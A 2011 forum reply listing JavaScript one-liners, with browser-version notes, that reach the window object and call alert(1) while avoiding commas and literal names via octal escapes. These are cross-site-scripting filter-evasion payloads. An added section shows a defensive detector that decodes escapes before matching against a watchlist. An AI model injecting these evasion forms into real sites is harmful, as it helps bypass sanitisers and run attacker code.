Re: Tricks for getting a reference to window
Date: June 20, 2011 05:09PM
I'm not sure what everyone else is using these tricks for, but I found it to be a great way to evaluate octal strings. I needed some new tricks because our old favorite trick "[],[]['sort']()" is not working in the latest versions of Firefox, and I was also in a situation where comma was not allowed.
So I grabbed some snippets of code from here and built a few code samples. Anything enclosed in '' can be replaced with its octal equivalent.
'\141\154\145\162\164' = 'alert'
$['__parent__']['alert'](1) //Firebug Console in FF3.6 Only
(0,[]['sort'])()['alert'](1) //FF3.6, Chrome, IE9
1.['__parent__']['alert'](1) //FF3.6
([],[]['sort'])()['alert'](1) //Chrome, FF3.6, IE9
/_/['__parent__']['alert'](1) //FF3.6
$['constructor']('alert(1)')() //JQuery Chrome, IE8, IE9, FF4, FF3.6
(0,[]['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0,{}['valueOf'])()['alert'](1) //Chrome, FF3.6, IE9
(0||$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1&&$['valueOf'])()['alert'](1) //JQuery Chrome, IE9, FF3.6
(1?$['valueOf']:0)()['alert'](1) //Jquery Chrome, IE9
[]['sort']['apply']()['alert'](1) //Chrome, FF3.6
(0,/0/(/0/)['sort'])()['alert'](1) //Chrome, FF3.6
('',/\//['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
(1?['']['valueOf']:0)()['alert'](1) //Chrome, IE9
''['big']['constructor']('alert(1)')() //FF4, FF3.6 IE8, IE9, Webkit
[]['map']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE9
(1&&[]['valueOf'])()['alert'](1) //Chrome, IE9, FF3.6
/_/['test']['constructor']('alert(1)')() //FF3.6, FF4, Chrome, IE8, IE9
(0||['']['valueOf'])()['alert'](1) //FF3.6, IE9, Chrome
(0.['valueOf'])['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
1.['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
(0)['constructor']['constructor']('alert(1)')() //FF3.6, FF4, IE8, IE9, Chrome
$='@mozilla.org/js/function';$::['alert'](1) //FF3.6, FF4
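
The octal substitution described in the post matters to anyone matching on property names: a check for the literal text 'alert' or 'constructor' never sees the escaped form. The following is an added example, not part of the original post, that decodes string-literal escapes inside bracket accesses before comparing; the `WATCHED` list, the function names and the sample input are constructed for illustration.

```javascript
// Added example: normalise JS string-literal escapes before matching, so that
// '\141\154\145\162\164' is compared as 'alert'. Names here are hypothetical.

// Constructed watchlist: property names the post's snippets reach via ['...'].
const WATCHED = new Set(['alert', 'constructor', '__parent__', 'valueOf', 'sort']);

const SIMPLE = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' };

// Decode the escapes a sloppy-mode string literal body may contain:
// legacy octal (\0 to \377), \xHH, \uHHHH, single-character escapes.
function decodeLiteral(body) {
  const re = /\\(?:([0-3][0-7]{0,2}|[4-7][0-7]?)|x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g;
  return body.replace(re, (m, oct, hex, uni, other) => {
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    if (hex !== undefined) return String.fromCharCode(parseInt(hex, 16));
    if (uni !== undefined) return String.fromCharCode(parseInt(uni, 16));
    if (other === '\n') return '';            // line continuation
    return Object.prototype.hasOwnProperty.call(SIMPLE, other) ? SIMPLE[other] : other;
  });
}

// Return the decoded name of every ['...'] or ["..."] access that is watched.
function watchedAccesses(source) {
  const re = /\[\s*(['"])((?:\\[\s\S]|(?!\1)[^\\])*)\1\s*\]/g;
  const hits = [];
  for (const m of source.matchAll(re)) {
    const name = decodeLiteral(m[2]);
    if (WATCHED.has(name)) hits.push(name);
  }
  return hits;
}

// Constructed input: one line from the post with 'alert' written in octal,
// as the post says can be done. Backslashes are doubled so this file itself
// contains no octal escape.
const SAMPLE = "(0,[]['sort'])()['\\141\\154\\145\\162\\164'](1)";

// A plain substring check does not see the name; the normalised check does.
function compareChecks(source) {
  return {
    naive: source.includes('alert'),
    normalised: watchedAccesses(source).includes('alert'),
  };
}

console.log(compareChecks(SAMPLE), watchedAccesses(SAMPLE));
```

This is a lexical check only: names assembled at run time by concatenation or other expressions are outside what it decodes.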